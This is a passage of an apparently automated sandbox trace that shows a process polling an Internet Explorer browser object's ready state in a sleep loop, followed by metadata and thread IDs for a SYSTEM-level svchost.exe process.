0x0 [0082.662] Sleep (dwMilliseconds=0x1f4) [0083.175] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0083.177] Sleep (dwMilliseconds=0x1f4) [0083.712] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0083.714] Sleep (dwMilliseconds=0x1f4) [0084.220] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0084.221] Sleep (dwMilliseconds=0x1f4) [0084.735] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0084.736] Sleep (dwMilliseconds=0x1f4) [0085.250] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0085.252] Sleep (dwMilliseconds=0x1f4) [0085.764] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0085.766] Sleep (dwMilliseconds=0x1f4) [0086.279] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0086.281] Sleep (dwMilliseconds=0x1f4) [0086.794] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0086.799] Sleep (dwMilliseconds=0x1f4) [0087.309] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0087.310] Sleep (dwMilliseconds=0x1f4) [0087.825] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0087.848] Sleep (dwMilliseconds=0x1f4) [0088.354] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0088.355] Sleep (dwMilliseconds=0x1f4) [0088.879] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0088.880] Sleep (dwMilliseconds=0x1f4) [0089.415] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0089.524] Sleep (dwMilliseconds=0x1f4) [0090.181] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0090.273] Sleep (dwMilliseconds=0x1f4) [0090.804] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0090.905] Sleep (dwMilliseconds=0x1f4) [0091.412] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0091.505] Sleep (dwMilliseconds=0x1f4) [0092.052] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0092.145] Sleep (dwMilliseconds=0x1f4) [0092.676] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0092.770] Sleep (dwMilliseconds=0x1f4) [0093.300] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0093.351] Sleep (dwMilliseconds=0x1f4) [0093.861] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0093.862] Sleep (dwMilliseconds=0x1f4) [0094.406] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0094.501] Sleep (dwMilliseconds=0x1f4) [0095.031] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0095.124] Sleep (dwMilliseconds=0x1f4) [0095.670] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0095.764] Sleep (dwMilliseconds=0x1f4) [0096.279] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0096.373] Sleep (dwMilliseconds=0x1f4) [0096.902] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0096.997] Sleep (dwMilliseconds=0x1f4) [0097.527] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0097.636] Sleep (dwMilliseconds=0x1f4) [0098.152] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0098.263] Sleep (dwMilliseconds=0x1f4) [0098.775] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0098.776] Sleep (dwMilliseconds=0x1f4) [0099.290] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0099.291] Sleep (dwMilliseconds=0x1f4) [0099.836] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0099.929] Sleep (dwMilliseconds=0x1f4) [0100.444] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0100.538] Sleep (dwMilliseconds=0x1f4) [0101.069] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0101.162] Sleep (dwMilliseconds=0x1f4) [0101.676] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0101.770] Sleep (dwMilliseconds=0x1f4) [0102.314] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0102.410] Sleep (dwMilliseconds=0x1f4) [0102.924] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0103.020] Sleep (dwMilliseconds=0x1f4) [0103.533] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0103.535] Sleep (dwMilliseconds=0x1f4) [0104.053] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0104.092] Sleep (dwMilliseconds=0x1f4) [0104.719] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0104.812] Sleep (dwMilliseconds=0x1f4) [0105.358] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0105.451] Sleep (dwMilliseconds=0x1f4) [0105.983] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0106.076] Sleep (dwMilliseconds=0x1f4) [0106.618] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0106.700] Sleep (dwMilliseconds=0x1f4) [0107.217] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0107.309] Sleep (dwMilliseconds=0x1f4) [0107.839] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0107.932] Sleep (dwMilliseconds=0x1f4) [0108.479] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0108.571] Sleep (dwMilliseconds=0x1f4) [0109.087] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0109.088] Sleep (dwMilliseconds=0x1f4) [0109.613] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0109.615] Sleep (dwMilliseconds=0x1f4) [0110.117] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0110.210] Sleep (dwMilliseconds=0x1f4) [0110.724] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0110.819] Sleep (dwMilliseconds=0x1f4) [0111.333] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0111.426] Sleep (dwMilliseconds=0x1f4) [0111.972] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0112.066] Sleep (dwMilliseconds=0x1f4) [0112.604] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0112.691] Sleep (dwMilliseconds=0x1f4) [0113.205] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0113.298] Sleep (dwMilliseconds=0x1f4) [0113.814] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0113.817] Sleep (dwMilliseconds=0x1f4) [0114.328] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0114.329] Sleep (dwMilliseconds=0x1f4) [0114.842] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0114.938] Sleep (dwMilliseconds=0x1f4) [0115.452] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0115.545] Sleep (dwMilliseconds=0x1f4) [0116.060] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0116.153] Sleep (dwMilliseconds=0x1f4) [0116.698] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0116.793] Sleep (dwMilliseconds=0x1f4) [0117.308] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0117.408] Sleep (dwMilliseconds=0x1f4) [0117.916] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0118.010] Sleep (dwMilliseconds=0x1f4) [0118.555] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0118.712] Sleep (dwMilliseconds=0x1f4) [0119.226] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0119.228] Sleep (dwMilliseconds=0x1f4) [0119.742] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0119.747] Sleep (dwMilliseconds=0x1f4) [0120.271] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0120.367] Sleep (dwMilliseconds=0x1f4) [0120.911] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0121.005] Sleep (dwMilliseconds=0x1f4) [0121.557] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0121.692] Sleep (dwMilliseconds=0x1f4) [0122.207] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0122.300] Sleep (dwMilliseconds=0x1f4) [0122.845] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0122.940] Sleep (dwMilliseconds=0x1f4) [0123.454] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0123.548] Sleep (dwMilliseconds=0x1f4) [0124.095] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0124.120] Sleep (dwMilliseconds=0x1f4) [0124.665] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0124.705] Sleep (dwMilliseconds=0x1f4) [0125.237] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0125.332] Sleep (dwMilliseconds=0x1f4) [0125.872] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0125.965] Sleep (dwMilliseconds=0x1f4) [0126.496] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0126.590] Sleep (dwMilliseconds=0x1f4) [0127.136] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0127.229] Sleep (dwMilliseconds=0x1f4) [0127.744] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0127.838] Sleep (dwMilliseconds=0x1f4) [0128.368] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0128.462] Sleep (dwMilliseconds=0x1f4) [0128.976] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0128.978] Sleep (dwMilliseconds=0x1f4) [0129.491] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0129.496] Sleep (dwMilliseconds=0x1f4) [0130.070] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0130.242] Sleep (dwMilliseconds=0x1f4) [0130.770] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0130.864] Sleep (dwMilliseconds=0x1f4) [0131.394] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0131.490] Sleep (dwMilliseconds=0x1f4) [0132.014] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0132.097] Sleep (dwMilliseconds=0x1f4) [0132.658] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0132.752] Sleep (dwMilliseconds=0x1f4) [0133.267] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0133.360] Sleep (dwMilliseconds=0x1f4) [0133.876] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0133.970] Sleep (dwMilliseconds=0x1f4) [0134.483] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0134.485] Sleep (dwMilliseconds=0x1f4) [0134.998] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0135.001] Sleep (dwMilliseconds=0x1f4) [0135.515] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0135.661] Sleep (dwMilliseconds=0x1f4) [0136.183] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0136.287] Sleep (dwMilliseconds=0x1f4) [0136.809] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0136.903] Sleep (dwMilliseconds=0x1f4) [0137.417] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0137.510] Sleep (dwMilliseconds=0x1f4) [0138.026] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0138.118] Sleep (dwMilliseconds=0x1f4) [0138.632] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0138.732] Sleep (dwMilliseconds=0x1f4) [0139.246] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0139.312] Sleep (dwMilliseconds=0x1f4) [0139.850] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0139.943] Sleep (dwMilliseconds=0x1f4) [0140.510] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0140.754] Sleep (dwMilliseconds=0x1f4) [0141.334] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0141.536] Sleep (dwMilliseconds=0x1f4) [0142.115] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0142.299] Sleep (dwMilliseconds=0x1f4) [0142.877] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0143.063] Sleep (dwMilliseconds=0x1f4) [0143.640] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0143.827] Sleep (dwMilliseconds=0x1f4) [0144.420] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0144.514] Sleep (dwMilliseconds=0x1f4) [0145.048] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0145.138] Sleep (dwMilliseconds=0x1f4) [0145.715] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0145.809] Sleep (dwMilliseconds=0x1f4) [0146.370] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0146.495] Sleep (dwMilliseconds=0x1f4) [0147.010] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0147.024] Sleep (dwMilliseconds=0x1f4) [0147.572] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0147.725] Sleep (dwMilliseconds=0x1f4) [0148.274] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0148.369] Sleep (dwMilliseconds=0x1f4) [0148.897] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0148.992] Sleep (dwMilliseconds=0x1f4) [0149.506] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0149.656] Sleep (dwMilliseconds=0x1f4) [0150.161] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0150.255] Sleep (dwMilliseconds=0x1f4) [0150.785] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0150.879] Sleep (dwMilliseconds=0x1f4) [0151.424] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0151.519] Sleep (dwMilliseconds=0x1f4) [0152.048] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0152.127] Sleep (dwMilliseconds=0x1f4) [0152.676] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0152.829] Sleep (dwMilliseconds=0x1f4) [0153.406] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0153.593] Sleep (dwMilliseconds=0x1f4) [0154.148] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0154.317] Sleep (dwMilliseconds=0x1f4) [0154.873] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0155.044] Sleep (dwMilliseconds=0x1f4) [0155.637] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0155.808] Sleep (dwMilliseconds=0x1f4) [0156.339] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0156.557] Sleep (dwMilliseconds=0x1f4) [0157.136] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0157.431] Sleep (dwMilliseconds=0x1f4) [0158.005] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0158.094] Sleep (dwMilliseconds=0x1f4) [0158.653] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0158.741] Sleep (dwMilliseconds=0x1f4) [0159.350] InternetExplorer:IWebBrowser2:get_ReadyState (This=0x505134, plReadyState=0x18fd98) Thread: id = 2 os_tid = 0x43c Thread: id = 3 os_tid = 0x290 Thread: id = 4 os_tid = 0x7a8 Thread: id = 5 os_tid = 0x564 Thread: id = 119 os_tid = 0xa88 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 6 os_tid = 0x360 Thread: id = 7 os_tid = 0x5e0 Thread: id = 8 os_tid = 0xa30 Thread: id = 9 os_tid = 0xa24 Thread: id = 10 os_tid = 0xad8 Thread: id = 11 os_tid = 0x5e4 Thread: id = 12 os_tid = 0x5f4 Thread: id = 13 os_tid = 0x1c4 Thread: id = 14 os_tid = 0xb0 Thread: id = 15 os_tid = 0x618 Thread: id = 16 os_tid = 0xb00 Thread: id = 17 os_tid = 0x344 Thread: id = 18 os_tid = 0x5a8 Thread: id = 19 os_tid = 0x54c Thread: id = 20 os_tid = 0x544 Thread: id = 21 os_tid = 0x320 Thread: id = 22 os_tid = 0x6cc Thread: id = 23 os_tid = 0x42c Thread: id = 24 os_tid = 0x1e4 Thread: id = 25 os_tid = 0x760 Thread: id = 26 os_tid = 0x75c Thread: id = 27 os_tid = 0x74c Thread: id = 28 os_tid = 0x710 Thread: id = 29 os_tid = 0x6d0 Thread: id = 30 os_tid = 0x6bc Thread: id = 31 os_tid = 0x6b8 Thread: id = 32 os_tid = 0x6b0 Thread: id = 33 os_tid = 0x6a8 Thread: id = 34 os_tid = 0x69c Thread: id = 35 os_tid = 0x698 Thread: id = 36 os_tid = 0x684 Thread: id = 37 os_tid = 0x678 Thread: id = 38 os_tid = 0x4a8 Thread: id = 39 os_tid = 0x46c Thread: id = 40 os_tid = 0x44c Thread: id = 41 os_tid = 0x424 Thread: id = 42 os_tid = 0x420 Thread: id = 43 os_tid = 0x41c Thread: id = 44 os_tid = 0x404 Thread: id = 45 os_tid = 0x14c Thread: id = 46 os_tid = 0x158 Thread: id = 47 os_tid = 0x3fc Thread: id = 48 os_tid = 0x3f4 Thread: id = 49 os_tid = 0x3e8 Thread: id = 50 os_tid = 0x39c Thread: id = 51 os_tid = 0x390 Thread: id = 52 os_tid = 0x38c Thread: id = 53 os_tid = 0x388 Thread: id = 54 os_tid = 0x37c Thread: id = 55 os_tid = 0x374 Thread: id = 99 os_tid = 0xbec Thread: id = 100 os_tid = 0xb20 Thread: 